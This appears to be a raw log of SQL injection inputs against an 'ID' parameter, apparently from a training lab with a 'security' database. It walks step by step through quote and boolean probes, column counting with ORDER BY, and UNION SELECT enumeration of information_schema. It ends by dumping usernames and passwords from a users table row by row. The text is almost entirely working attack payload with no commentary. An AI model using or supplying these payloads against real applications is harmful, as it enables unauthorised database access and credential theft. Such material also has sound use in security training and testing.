ID:1
ID:1
ID:1
ID:1
ID:1'
ID:1 and 1=1
ID:1 and 1=2
ID:1 order by 1-- 
ID:1 order by 2-- 
ID:1 order by 3-- 
ID:1 order by 4-- 
ID:1 and 1=2 union select 1,2,3-- 
ID:1 and 1=2 union select 1,2,database()-- 
ID:1 and 1=2 union select 1,2,table_name from information_schema.tables where table_schema='security'-- 
ID:1 and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'-- 
ID:1 and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'-- 
ID:1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users-- 
ID:1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 0,1-- 
ID:1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 1,1-- 
ID:1 and 1=2 union select 1,2,concat_ws(',',id,username,password) from security.users limit 2,1-- 
ID:1
ID:1'
ID:1'
